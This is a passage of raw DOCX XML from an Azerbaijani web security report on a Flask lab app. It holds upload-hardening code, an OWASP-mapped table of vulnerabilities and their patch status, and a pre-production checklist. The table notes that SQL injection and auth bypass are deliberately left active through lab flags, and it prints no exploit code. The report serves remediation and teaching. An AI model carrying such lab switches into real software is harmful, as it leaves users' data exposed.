          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Düzgün Yol</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 1. UUID əsaslı unikal saxlama adı</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">import uuid</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">safe_name = uuid.uuid4().hex + ext  # "a1b2c3...90ab.jpg"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">dest_path = UPLOAD_DIR / safe_name</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 2. Mime type yoxlaması (python-magic)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">import magic</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ALLOWED_MIMES = {"image/jpeg", "image/png", "application/pdf"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if magic.from_file(str(dest_path), mime=True) not in ALLOWED_MIMES:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    dest_path.unlink()  # Faylı sil</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    return jsonify({"ok": False, "error": "Fayl məzmunu uyğun deyil."}), 400</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># 3. HTTP başlığı — brauzer faylı açmasın, yükləsin</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">response.headers["Content-Disposition"] = "attachment"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">response.headers["X-Content-Type-Options"] = "nosniff"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Yamalar Xülasəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1. Tam Müqayisə Cədvəli</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9846"/>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1500"/>
        <w:gridCol w:w="2000"/>
        <w:gridCol w:w="3946"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="400"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Zəiflik</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vəziyyət</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Yama</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A03:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Lab-da aktiv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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%s parametrləri — mövcuddur (təhlükəsiz yol)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Auth Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Lab-da aktiv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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check_password_hash — mövcuddur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Info Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A09:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Lab-da aktiv</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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query_probe bloku silinməlidir — əlavə lazım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Broken Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A01:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 E-poçt yoxlaması</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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RBAC cədvəli — əlavə lazım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A01:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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 Həll olunub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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AND t.user_id=%s — mövcuddur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Stored XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A03:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Sanitasiya yox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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bleach + DOMPurify — əlavə lazım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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File Upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A08:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Qismən</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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UUID adı + mime yoxlama — əlavə lazım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Path Traversal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A01:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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 Həll olunub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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relative_to() — mövcuddur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Parol Hash</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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 Tətbiq olunub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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PBKDF2-SHA256 — mövcuddur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Cookie Güvənliyi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2EFDA"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 Vercel-də</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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Secure, HttpOnly, SameSite — mövcuddur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Giriş Limiti</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A07:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Yoxdur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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flask-limiter — əlavə lazım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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CSP Header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A03:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Yoxdur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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Content-Security-Policy — əlavə lazım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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MIME Yoxlama</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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A08:2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF2CC"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 Yoxdur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3946"/>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python-magic — əlavə lazım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2. İstehsala Çıxış Yoxlama Siyahısı</w:t>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Layihəni produksiya mühitinə köçürməzdən əvvəl aşağıdakı tədbirlər mütləq yerinə yetirilməlidir:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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1000"/>
        <w:gridCol w:w="7846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1000"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Vəziyyət</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Addım</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FCE4D6"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.env-də WEBSEC_LAB=0 təyin et</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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DEV_INSECURE_SQL=0 və DEV_AUTH_BYPASS=0 təyin et</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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FLASK_SECRET_KEY — uzun (min 32 simvol), tam təsadüfi, sabit açar</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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Flask debug=False</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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bleach əlavə et → about_me HTML sanitasiyası</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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UUID fayl adları → toqquşma riski aradan qalxır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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RBAC cədvəli → admin yalnız DB-dəki rol ilə</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="10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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7846"/>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flask-limiter → /api/login və /api/register üçün dəqiqədə 5 cəhd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
